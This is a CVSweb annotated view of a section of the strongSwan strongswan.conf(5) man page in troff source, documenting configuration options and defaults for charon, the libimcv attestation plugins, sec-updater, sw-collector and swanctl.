1835: .BR charon.port_nat_t " [4500]"
1836: UDP port used locally in case of NAT\-T. If set to 0 a random port will be
1837: allocated. Has to be different from
1838: .RB "" "charon.port" ","
1839: otherwise a random port
1840: will be allocated.
1841:
1842: .TP
1843: .BR charon.prefer_best_path " [no]"
1844: By default, charon keeps SAs on the routing path with addresses it previously
1845: used if that path is still usable. By setting this option to yes, it tries more
1846: aggressively to update SAs with MOBIKE on routing priority changes using the
1847: cheapest path. This adds more noise, but allows to dynamically adapt SAs to
1848: routing priority changes. This option has no effect if MOBIKE is not supported
1849: or disabled.
1850:
1851: .TP
1852: .BR charon.prefer_configured_proposals " [yes]"
1853: Prefer locally configured proposals for IKE/IPsec over supplied ones as
1854: responder (disabling this can avoid keying retries due to INVALID_KE_PAYLOAD
1855: notifies).
1856:
1857: .TP
1858: .BR charon.prefer_temporary_addrs " [no]"
1859: By default, permanent IPv6 source addresses are preferred over temporary ones
1860: (RFC 4941), to make connections more stable. Enable this option to reverse this.
1861:
1862: It also affects which IPv6 addresses are announced as additional addresses if
1863: MOBIKE is used. If the option is disabled, only permanent addresses are sent,
1864: and only temporary ones if it is enabled.
1865:
1866: .TP
1867: .BR charon.process_route " [yes]"
1868: Process RTM_NEWROUTE and RTM_DELROUTE events.
1869:
1870: .TP
1871: .B charon.processor.priority_threads
1872: .br
1873: Section to configure the number of reserved threads per priority class see JOB
1874: PRIORITY MANAGEMENT in
1875: .RB "" "strongswan.conf" "(5)."
1876:
1877:
1878: .TP
1879: .BR charon.rdn_matching " [strict]"
1880: How RDNs in subject DNs of certificates are matched against configured
1881: identities. Possible values are
1882: .RI "" "strict" ""
1883: (the default),
1884: .RI "" "reordered" ","
1885: and
1886: .RI "" "relaxed" "."
1887: With
1888: .RI "" "strict" ""
1889: the number, type and order of all RDNs has to match,
1890: wildcards (*) for the values of RDNs are allowed (that's the case for all three
1891: variants). Using
1892: .RI "" "reordered" ""
1893: also matches DNs if the RDNs appear in a different
1894: order, the number and type still has to match. Finally,
1895: .RI "" "relaxed" ""
1896: also allows
1897: matches of DNs that contain more RDNs than the configured identity (missing RDNs
1898: are treated like a wildcard match).
1899:
1900: Note that
1901: .RI "" "reordered" ""
1902: and
1903: .RI "" "relaxed" ""
1904: impose a considerable overhead on memory
1905: usage and runtime, in particular, for mismatches, compared to
1906: .RI "" "strict" "."
1907:
1908:
1909: .TP
1910: .BR charon.receive_delay " [0]"
1911: Delay in ms for receiving packets, to simulate larger RTT.
1912:
1913: .TP
1914: .BR charon.receive_delay_request " [yes]"
1915: Delay request messages.
1916:
1917: .TP
1918: .BR charon.receive_delay_response " [yes]"
1919: Delay response messages.
1920:
1921: .TP
1922: .BR charon.receive_delay_type " [0]"
1923: Specific IKEv2 message type to delay, 0 for any.
1924:
1925: .TP
1926: .BR charon.replay_window " [32]"
1927: Size of the AH/ESP replay window, in packets.
1928:
1929: .TP
1930: .BR charon.retransmit_base " [1.8]"
1931: Base to use for calculating exponential back off, see IKEv2 RETRANSMISSION in
1932: .RB "" "strongswan.conf" "(5)."
1933:
1934:
1935: .TP
1936: .BR charon.retransmit_jitter " [0]"
1937: Maximum jitter in percent to apply randomly to calculated retransmission timeout
1938: (0 to disable).
1939:
1940: .TP
1941: .BR charon.retransmit_limit " [0]"
1942: Upper limit in seconds for calculated retransmission timeout (0 to disable).
1943:
1944: .TP
1945: .BR charon.retransmit_timeout " [4.0]"
1946: Timeout in seconds before sending first retransmit.
1947:
1948: .TP
1949: .BR charon.retransmit_tries " [5]"
1950: Number of times to retransmit a packet before giving up.
1951:
1952: .TP
1953: .BR charon.retry_initiate_interval " [0]"
1954: Interval in seconds to use when retrying to initiate an IKE_SA (e.g. if DNS
1955: resolution failed), 0 to disable retries.
1956:
1957: .TP
1958: .BR charon.reuse_ikesa " [yes]"
1959: Initiate CHILD_SA within existing IKE_SAs (always enabled for IKEv1).
1960:
1961: .TP
1962: .BR charon.routing_table " []"
1963: Numerical routing table to install routes to.
1964:
1965: .TP
1966: .BR charon.routing_table_prio " []"
1967: Priority of the routing table.
1968:
1969: .TP
1970: .BR charon.rsa_pss " [no]"
1971: Whether to use RSA with PSS padding instead of PKCS#1 padding by default.
1972:
1973: .TP
1974: .BR charon.send_delay " [0]"
1975: Delay in ms for sending packets, to simulate larger RTT.
1976:
1977: .TP
1978: .BR charon.send_delay_request " [yes]"
1979: Delay request messages.
1980:
1981: .TP
1982: .BR charon.send_delay_response " [yes]"
1983: Delay response messages.
1984:
1985: .TP
1986: .BR charon.send_delay_type " [0]"
1987: Specific IKEv2 message type to delay, 0 for any.
1988:
1989: .TP
1990: .BR charon.send_vendor_id " [no]"
1991: Send strongSwan vendor ID payload
1992:
1993: .TP
1994: .BR charon.signature_authentication " [yes]"
1995: Whether to enable Signature Authentication as per RFC 7427.
1996:
1997: .TP
1998: .BR charon.signature_authentication_constraints " [yes]"
1999: If enabled, signature schemes configured in
2000: .RI "" "rightauth" ","
2001: in addition to getting
2002: used as constraints against signature schemes employed in the certificate chain,
2003: are also used as constraints against the signature scheme used by peers during
2004: IKEv2.
2005:
2006: .TP
2007: .BR charon.spi_label " [0x0000000000000000]"
2008: Value mixed into the local IKE SPIs after applying
2009: .RI "" "spi_mask" "."
2010:
2011:
2012: .TP
2013: .BR charon.spi_mask " [0x0000000000000000]"
2014: Mask applied to local IKE SPIs before mixing in
2015: .RI "" "spi_label" ""
2016: (bits set will be
2017: replaced with
2018: .RI "" "spi_label" ")."
2019:
2020:
2021: .TP
2022: .BR charon.spi_max " [0xcfffffff]"
2023: The upper limit for SPIs requested from the kernel for IPsec SAs.
2024:
2025: .TP
2026: .BR charon.spi_min " [0xc0000000]"
2027: The lower limit for SPIs requested from the kernel for IPsec SAs. Should not be
2028: set lower than 0x00000100 (256), as SPIs between 1 and 255 are reserved by IANA.
2029:
2030: .TP
2031: .B charon.start-scripts
2032: .br
2033: Section containing a list of scripts (name = path) that are executed when the
2034: daemon is started.
2035:
2036: .TP
2037: .B charon.stop-scripts
2038: .br
2039: Section containing a list of scripts (name = path) that are executed when the
2040: daemon is terminated.
2041:
2042: .TP
2043: .B charon.syslog
2044: .br
2045: Section to define syslog loggers, see LOGGER CONFIGURATION in
2046: .RB "" "strongswan.conf" "(5)."
2047:
2048:
2049: .TP
2050: .B charon.syslog.<facility>
2051: .br
2052: <facility> is one of the supported syslog facilities, see LOGGER CONFIGURATION
2053: in
2054: .RB "" "strongswan.conf" "(5)."
2055:
2056:
2057: .TP
2058: .BR charon.syslog.<facility>.<subsystem> " [<default>]"
2059: Loglevel for a specific subsystem.
2060:
2061: .TP
2062: .BR charon.syslog.<facility>.default " [1]"
2063: Specifies the default loglevel to be used for subsystems for which no specific
2064: loglevel is defined.
2065:
2066: .TP
2067: .BR charon.syslog.<facility>.ike_name " [no]"
2068: Prefix each log entry with the connection name and a unique numerical identifier
2069: for each IKE_SA.
2070:
2071: .TP
1.1.1.2 ! misho 2072: .BR charon.syslog.<facility>.log_level " [no]"
! 2073: Add the log level of each message after the subsystem (e.g. [IKE2]).
! 2074:
! 2075: .TP
1.1 misho 2076: .BR charon.syslog.identifier " []"
2077: Global identifier used for an
2078: .RB "" "openlog" "(3)"
2079: call, prepended to each log message
2080: by syslog. If not configured,
2081: .RB "" "openlog" "(3)"
2082: is not called, so the value will
2083: depend on system defaults (often the program name).
2084:
2085: .TP
2086: .BR charon.threads " [16]"
2087: Number of worker threads in charon. Several of these are reserved for long
2088: running tasks in internal modules and plugins. Therefore, make sure you don't
2089: set this value too low. The number of idle worker threads listed in
2090: .RI "" "ipsec statusall" ""
2091: might be used as indicator on the number of reserved threads.
2092:
2093: .TP
2094: .BR charon.tls.cipher " []"
2095: List of TLS encryption ciphers.
2096:
2097: .TP
1.1.1.2 ! misho 2098: .BR charon.tls.ke_group " []"
! 2099: List of TLS key exchange groups.
! 2100:
! 2101: .TP
1.1 misho 2102: .BR charon.tls.key_exchange " []"
2103: List of TLS key exchange methods.
2104:
2105: .TP
2106: .BR charon.tls.mac " []"
2107: List of TLS MAC algorithms.
2108:
2109: .TP
1.1.1.2 ! misho 2110: .BR charon.tls.send_certreq_authorities " [yes]"
! 2111: Whether to include CAs in a server's CertificateRequest message. May be disabled
! 2112: if clients can't handle a long list of CAs.
! 2113:
! 2114: .TP
! 2115: .BR charon.tls.signature " []"
! 2116: List of TLS signature schemes.
! 2117:
! 2118: .TP
1.1 misho 2119: .BR charon.tls.suites " []"
2120: List of TLS cipher suites.
2121:
2122: .TP
1.1.1.2 ! misho 2123: .BR charon.tls.version_max " [1.2]"
! 2124: Maximum TLS version to negotiate.
! 2125:
! 2126: .TP
! 2127: .BR charon.tls.version_min " [1.2]"
! 2128: Minimum TLS version to negotiate.
! 2129:
! 2130: .TP
1.1 misho 2131: .BR charon.tnc.tnc_config " [/etc/tnc_config]"
2132: TNC IMC/IMV configuration file.
2133:
2134: .TP
2135: .BR charon.user " []"
2136: Name of the user the daemon changes to after startup.
2137:
2138: .TP
2139: .BR charon.x509.enforce_critical " [yes]"
2140: Discard certificates with unsupported or unknown critical extensions.
2141:
2142: .TP
2143: .BR charon-nm.ca_dir " [<default>]"
2144: Directory from which to load CA certificates if no certificate is configured.
2145:
2146: .TP
2147: .B charon-systemd.journal
2148: .br
2149: Section to configure native systemd journal logger, very similar to the syslog
2150: logger as described in LOGGER CONFIGURATION in
2151: .RB "" "strongswan.conf" "(5)."
2152:
2153:
2154: .TP
2155: .BR charon-systemd.journal.<subsystem> " [<default>]"
2156: Loglevel for a specific subsystem.
2157:
2158: .TP
2159: .BR charon-systemd.journal.default " [1]"
2160: Specifies the default loglevel to be used for subsystems for which no specific
2161: loglevel is defined.
2162:
2163: .TP
2164: .BR imv_policy_manager.command_allow " []"
2165: Shell command to be executed with recommendation allow.
2166:
2167: .TP
2168: .BR imv_policy_manager.command_block " []"
2169: Shell command to be executed with all other recommendations.
2170:
2171: .TP
2172: .BR imv_policy_manager.database " []"
2173: Database URI for the database that stores the package information. If it
2174: contains a password, make sure to adjust the permissions of the config file
2175: accordingly.
2176:
2177: .TP
2178: .BR imv_policy_manager.load " [sqlite]"
2179: Plugins to load in IMV policy manager.
2180:
2181: .TP
2182: .BR libimcv.debug_level " [1]"
2183: Debug level for a stand\-alone
2184: .RI "" "libimcv" ""
2185: library.
2186:
2187: .TP
2188: .BR libimcv.load " [random nonce gmp pubkey x509]"
2189: Plugins to load in IMC/IMVs with stand\-alone
2190: .RI "" "libimcv" ""
2191: library.
2192:
2193: .TP
2194: .BR libimcv.plugins.imc-attestation.aik_blob " []"
2195: AIK encrypted private key blob file.
2196:
2197: .TP
2198: .BR libimcv.plugins.imc-attestation.aik_cert " []"
2199: AIK certificate file.
2200:
2201: .TP
2202: .BR libimcv.plugins.imc-attestation.aik_handle " []"
2203: AIK object handle.
2204:
2205: .TP
2206: .BR libimcv.plugins.imc-attestation.aik_pubkey " []"
2207: AIK public key file.
2208:
2209: .TP
1.1.1.2 ! misho 2210: .BR libimcv.plugins.imc-attestation.hash_algorithm " [sha384]"
! 2211: Preferred measurement hash algorithm.
! 2212:
! 2213: .TP
1.1 misho 2214: .BR libimcv.plugins.imc-attestation.mandatory_dh_groups " [yes]"
2215: Enforce mandatory Diffie\-Hellman groups.
2216:
2217: .TP
2218: .BR libimcv.plugins.imc-attestation.nonce_len " [20]"
2219: DH nonce length.
2220:
2221: .TP
2222: .BR libimcv.plugins.imc-attestation.pcr17_after " []"
2223: PCR17 value after measurement.
2224:
2225: .TP
2226: .BR libimcv.plugins.imc-attestation.pcr17_before " []"
2227: PCR17 value before measurement.
2228:
2229: .TP
2230: .BR libimcv.plugins.imc-attestation.pcr17_meas " []"
2231: Dummy measurement value extended into PCR17 if the TBOOT log is not available.
2232:
2233: .TP
2234: .BR libimcv.plugins.imc-attestation.pcr18_after " []"
2235: PCR18 value after measurement.
2236:
2237: .TP
2238: .BR libimcv.plugins.imc-attestation.pcr18_before " []"
2239: PCR18 value before measurement.
2240:
2241: .TP
2242: .BR libimcv.plugins.imc-attestation.pcr18_meas " []"
2243: Dummy measurement value extended into PCR17 if the TBOOT log is not available.
2244:
2245: .TP
2246: .BR libimcv.plugins.imc-attestation.pcr_info " [no]"
2247: Whether to send pcr_before and pcr_after info.
2248:
2249: .TP
1.1.1.2 ! misho 2250: .BR libimcv.plugins.imc-attestation.pcr_padding " [no]"
! 2251: Whether to pad IMA SHA1 measurements values when extending into SHA256 PCR bank.
! 2252:
! 2253: .TP
1.1 misho 2254: .BR libimcv.plugins.imc-attestation.use_quote2 " [yes]"
2255: Use Quote2 AIK signature instead of Quote signature.
2256:
2257: .TP
2258: .BR libimcv.plugins.imc-attestation.use_version_info " [no]"
2259: Version Info is included in Quote2 signature.
2260:
2261: .TP
2262: .BR libimcv.plugins.imc-hcd.push_info " [yes]"
2263: Send quadruple info without being prompted.
2264:
2265: .TP
2266: .BR libimcv.plugins.imc-hcd.subtypes " []"
2267: Section to define PWG HCD PA subtypes.
2268:
2269: .TP
2270: .BR libimcv.plugins.imc-hcd.subtypes.<section> " []"
2271: Defines a PWG HCD PA subtype section. Recognized subtype section names are
2272: .RI "" "system" ","
2273: .RI "" "control" ","
2274: .RI "" "marker" ","
2275: .RI "" "finisher" ","
2276: .RI "" "interface" ""
2277: and
2278: .RI "" "scanner" "."
2279:
2280:
2281: .TP
2282: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type> " []"
2283: Defines a software type section. Recognized software type section names are
2284: .RI "" "firmware" ","
2285: .RI "" "resident_application" ""
2286: and
2287: .RI "" "user_application" "."
2288:
2289:
2290: .TP
2291: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software> " []"
2292: Defines a software section having an arbitrary name.
2293:
2294: .TP
2295: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.name " []"
2296: Name of the software installed on the hardcopy device.
2297:
2298: .TP
2299: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.patches " []"
2300: String describing all patches applied to the given software on this hardcopy
2301: device. The individual patches are separated by a newline character '\\n'.
2302:
2303: .TP
2304: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.string_version " []"
2305: String describing the version of the given software on this hardcopy device.
2306:
2307: .TP
2308: .BR libimcv.plugins.imc-hcd.subtypes.<section>.<sw_type>.<software>.version " []"
2309: Hex\-encoded version string with a length of 16 octets consisting of the fields
2310: major version number (4 octets), minor version number (4 octets), build number
2311: (4 octets), service pack major number (2 octets) and service pack minor number
2312: (2 octets).
2313:
2314: .TP
2315: .BR libimcv.plugins.imc-hcd.subtypes.<section>.attributes_natural_language " [en]"
2316: Variable length natural language tag conforming to RFC 5646 specifies the
2317: language to be used in the health assessment message of a given subtype.
2318:
2319: .TP
2320: .BR libimcv.plugins.imc-hcd.subtypes.system.certification_state " []"
2321: Hex\-encoded certification state.
2322:
2323: .TP
2324: .BR libimcv.plugins.imc-hcd.subtypes.system.configuration_state " []"
2325: Hex\-encoded configuration state.
2326:
2327: .TP
2328: .BR libimcv.plugins.imc-hcd.subtypes.system.machine_type_model " []"
2329: String specifying the machine type and model of the hardcopy device.
2330:
2331: .TP
2332: .BR libimcv.plugins.imc-hcd.subtypes.system.pstn_fax_enabled " [no]"
2333: Specifies if a PSTN facsimile interface is installed and enabled on the hardcopy
2334: device.
2335:
2336: .TP
2337: .BR libimcv.plugins.imc-hcd.subtypes.system.time_source " []"
2338: String specifying the hostname of the network time server used by the hardcopy
2339: device.
2340:
2341: .TP
2342: .BR libimcv.plugins.imc-hcd.subtypes.system.user_application_enabled " [no]"
2343: Specifies if users can dynamically download and execute applications on the
2344: hardcopy device.
2345:
2346: .TP
2347: .BR libimcv.plugins.imc-hcd.subtypes.system.user_application_persistence_enabled " [no]"
2348: Specifies if user dynamically downloaded applications can persist outside the
2349: boundaries of a single job on the hardcopy device.
2350:
2351: .TP
2352: .BR libimcv.plugins.imc-hcd.subtypes.system.vendor_name " []"
2353: String specifying the manufacturer of the hardcopy device.
2354:
2355: .TP
2356: .BR libimcv.plugins.imc-hcd.subtypes.system.vendor_smi_code " []"
2357: Integer specifying the globally unique 24\-bit SMI code assigned to the
2358: manufacturer of the hardcopy device.
2359:
2360: .TP
2361: .BR libimcv.plugins.imc-os.device_cert " []"
2362: Manually set the path to the client device certificate (e.g.
2363: /etc/pts/aikCert.der)
2364:
2365: .TP
2366: .BR libimcv.plugins.imc-os.device_handle " []"
2367: Manually set handle to a private key bound to a smartcard or TPM (e.g.
2368: 0x81010004)
2369:
2370: .TP
2371: .BR libimcv.plugins.imc-os.device_id " []"
2372: Manually set the client device ID in hexadecimal format (e.g.
2373: 1083f03988c9762703b1c1080c2e46f72b99cc31)
2374:
2375: .TP
2376: .BR libimcv.plugins.imc-os.device_pubkey " []"
2377: Manually set the path to the client device public key (e.g. /etc/pts/aikPub.der)
2378:
2379: .TP
2380: .BR libimcv.plugins.imc-os.push_info " [yes]"
2381: Send operating system info without being prompted.
2382:
2383: .TP
2384: .BR libimcv.plugins.imc-scanner.push_info " [yes]"
2385: Send open listening ports without being prompted.
2386:
2387: .TP
2388: .BR libimcv.plugins.imc-swima.eid_epoch " [0x11223344]"
2389: Set 32 bit epoch value for event IDs manually if software collector database is
2390: not available.
2391:
2392: .TP
2393: .BR libimcv.plugins.imc-swima.subscriptions " [no]"
2394: Accept SW Inventory or SW Events subscriptions.
2395:
2396: .TP
2397: .BR libimcv.plugins.imc-swima.swid_database " []"
2398: URI to software collector database containing event timestamps, software
2399: creation and deletion events and collected software identifiers. If it contains
2400: a password, make sure to adjust the permissions of the config file accordingly.
2401:
2402: .TP
2403: .BR libimcv.plugins.imc-swima.swid_directory " [${prefix}/share]"
2404: Directory where SWID tags are located.
2405:
2406: .TP
2407: .BR libimcv.plugins.imc-swima.swid_full " [no]"
2408: Include file information in the XML\-encoded SWID tags.
2409:
2410: .TP
2411: .BR libimcv.plugins.imc-swima.swid_pretty " [no]"
2412: Generate XML\-encoded SWID tags with pretty indentation.
2413:
2414: .TP
2415: .BR libimcv.plugins.imc-test.additional_ids " [0]"
2416: Number of additional IMC IDs.
2417:
2418: .TP
2419: .BR libimcv.plugins.imc-test.command " [none]"
2420: Command to be sent to the Test IMV.
2421:
2422: .TP
2423: .BR libimcv.plugins.imc-test.dummy_size " [0]"
2424: Size of dummy attribute to be sent to the Test IMV (0 = disabled).
2425:
2426: .TP
2427: .BR libimcv.plugins.imc-test.retry " [no]"
2428: Do a handshake retry.
2429:
2430: .TP
2431: .BR libimcv.plugins.imc-test.retry_command " []"
2432: Command to be sent to the Test IMV in the handshake retry.
2433:
2434: .TP
2435: .BR libimcv.plugins.imv-attestation.cadir " []"
2436: Path to directory with AIK cacerts.
2437:
2438: .TP
2439: .BR libimcv.plugins.imv-attestation.dh_group " [ecp256]"
2440: Preferred Diffie\-Hellman group.
2441:
2442: .TP
1.1.1.2 ! misho 2443: .BR libimcv.plugins.imv-attestation.hash_algorithm " [sha384]"
1.1 misho 2444: Preferred measurement hash algorithm.
2445:
2446: .TP
2447: .BR libimcv.plugins.imv-attestation.mandatory_dh_groups " [yes]"
2448: Enforce mandatory Diffie\-Hellman groups.
2449:
2450: .TP
2451: .BR libimcv.plugins.imv-attestation.min_nonce_len " [0]"
2452: DH minimum nonce length.
2453:
2454: .TP
2455: .BR libimcv.plugins.imv-os.remediation_uri " []"
2456: URI pointing to operating system remediation instructions.
2457:
2458: .TP
2459: .BR libimcv.plugins.imv-scanner.remediation_uri " []"
2460: URI pointing to scanner remediation instructions.
2461:
2462: .TP
2463: .BR libimcv.plugins.imv-swima.rest_api.timeout " [120]"
2464: Timeout of SWID REST API HTTP POST transaction.
2465:
2466: .TP
2467: .BR libimcv.plugins.imv-swima.rest_api.uri " []"
2468: HTTP URI of the SWID REST API.
2469:
2470: .TP
2471: .BR libimcv.plugins.imv-test.rounds " [0]"
2472: Number of IMC\-IMV retry rounds.
2473:
2474: .TP
2475: .BR libimcv.stderr_quiet " [no]"
2476: Disable output to stderr with a stand\-alone
2477: .RI "" "libimcv" ""
2478: library.
2479:
2480: .TP
2481: .BR libimcv.swid_gen.command " [/usr/local/bin/swid_generator]"
2482: SWID generator command to be executed.
2483:
2484: .TP
2485: .BR libimcv.swid_gen.tag_creator.name " [strongSwan Project]"
2486: Name of the tagCreator entity.
2487:
2488: .TP
2489: .BR libimcv.swid_gen.tag_creator.regid " [strongswan.org]"
2490: regid of the tagCreator entity.
2491:
2492: .TP
2493: .BR manager.database " []"
2494: Credential database URI for manager. If it contains a password, make sure to
2495: adjust the permissions of the config file accordingly.
2496:
2497: .TP
2498: .BR manager.debug " [no]"
2499: Enable debugging in manager.
2500:
2501: .TP
2502: .BR manager.load " []"
2503: Plugins to load in manager.
2504:
2505: .TP
2506: .BR manager.socket " []"
2507: FastCGI socket of manager, to run it statically.
2508:
2509: .TP
2510: .BR manager.threads " [10]"
2511: Threads to use for request handling.
2512:
2513: .TP
2514: .BR manager.timeout " [15m]"
2515: Session timeout for manager.
2516:
2517: .TP
2518: .BR medsrv.database " []"
2519: Mediation server database URI. If it contains a password, make sure to adjust
2520: the permissions of the config file accordingly.
2521:
2522: .TP
2523: .BR medsrv.debug " [no]"
2524: Debugging in mediation server web application.
2525:
2526: .TP
2527: .BR medsrv.dpd " [5m]"
2528: DPD timeout to use in mediation server plugin.
2529:
2530: .TP
2531: .BR medsrv.load " []"
2532: Plugins to load in mediation server plugin.
2533:
2534: .TP
2535: .BR medsrv.password_length " [6]"
2536: Minimum password length required for mediation server user accounts.
2537:
2538: .TP
2539: .BR medsrv.rekey " [20m]"
2540: Rekeying time on mediation connections in mediation server plugin.
2541:
2542: .TP
2543: .BR medsrv.socket " []"
2544: Run Mediation server web application statically on socket.
2545:
2546: .TP
2547: .BR medsrv.threads " [5]"
2548: Number of thread for mediation service web application.
2549:
2550: .TP
2551: .BR medsrv.timeout " [15m]"
2552: Session timeout for mediation service.
2553:
2554: .TP
2555: .BR pki.load " []"
2556: Plugins to load in ipsec pki tool.
2557:
2558: .TP
2559: .BR pool.database " []"
2560: Database URI for the database that stores IP pools and configuration attributes.
2561: If it contains a password, make sure to adjust the permissions of the
2562: config file accordingly.
2563:
2564: .TP
2565: .BR pool.load " []"
2566: Plugins to load in ipsec pool tool.
2567:
2568: .TP
2569: .BR scepclient.load " []"
2570: Plugins to load in ipsec scepclient tool.
2571:
2572: .TP
2573: .B sec-updater
2574: .br
2575: Options for the sec\-updater tool.
2576:
2577: .TP
2578: .BR sec-updater.database " []"
2579: Global IMV policy database URI. If it contains a password, make sure to adjust
2580: the permissions of the config file accordingly.
2581:
2582: .TP
2583: .BR sec-updater.load " []"
2584: Plugins to load in sec\-updater tool.
2585:
2586: .TP
2587: .BR sec-updater.swid_gen.command " [/usr/local/bin/swid_generator]"
2588: SWID generator command to be executed.
2589:
2590: .TP
2591: .BR sec-updater.swid_gen.tag_creator.name " [strongSwan Project]"
2592: Name of the tagCreator entity.
2593:
2594: .TP
2595: .BR sec-updater.swid_gen.tag_creator.regid " [strongswan.org]"
2596: regid of the tagCreator entity.
2597:
2598: .TP
2599: .BR sec-updater.tmp.deb_file " [/tmp/sec-updater.deb]"
2600: Temporary storage for downloaded deb package file.
2601:
2602: .TP
2603: .BR sec-updater.tmp.tag_file " [/tmp/sec-updater.tag]"
2604: Temporary storage for generated SWID tags.
2605:
2606: .TP
2607: .BR sec-updater.tnc_manage_command " [/var/www/tnc/manage.py]"
2608: strongTNC manage.py command used to import SWID tags.
2609:
2610: .TP
2611: .BR starter.config_file " [${sysconfdir}/ipsec.conf]"
2612: Location of the ipsec.conf file
2613:
2614: .TP
2615: .BR starter.load_warning " [yes]"
2616: Disable charon plugin load option warning.
2617:
2618: .TP
2619: .B sw-collector
2620: .br
2621: Options for the sw\-collector tool.
2622:
2623: .TP
2624: .BR sw-collector.database " []"
2625: URI to software collector database containing event timestamps, software
2626: creation and deletion events and collected software identifiers. If it contains
2627: a password, make sure to adjust the permissions of the config file accordingly.
2628:
2629: .TP
2630: .BR sw-collector.first_file " [/var/log/bootstrap.log]"
2631: Path pointing to file created when the Linux OS was installed.
2632:
2633: .TP
2634: .BR sw-collector.first_time " [0000-00-00T00:00:00Z]"
2635: Time in UTC when the Linux OS was installed.
2636:
2637: .TP
2638: .BR sw-collector.history " []"
2639: Path pointing to apt history.log file.
2640:
2641: .TP
2642: .BR sw-collector.load " []"
2643: Plugins to load in sw\-collector tool.
2644:
2645: .TP
2646: .BR sw-collector.rest_api.timeout " [120]"
2647: Timeout of REST API HTTP POST transaction.
2648:
2649: .TP
2650: .BR sw-collector.rest_api.uri " []"
2651: HTTP URI of the central collector's REST API.
2652:
2653: .TP
2654: .BR swanctl.load " []"
2655: Plugins to load in swanctl.
2656:
2657: .TP
2658: .BR swanctl.socket " [unix://${piddir}/charon.vici]"
2659: VICI socket to connect to by default.
2660:
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>
![[BACK]](/icons/cvsweb/back.gif){kind=icon}
Return to strongswan.conf.5.main CVS log ![[TXT]](/icons/cvsweb/text.gif){kind=icon}
![[DIR]](/icons/cvsweb/dir.gif){kind=icon}
Up to [ELWIX - Embedded LightWeight unIX -] / embedaddon / strongswan / conf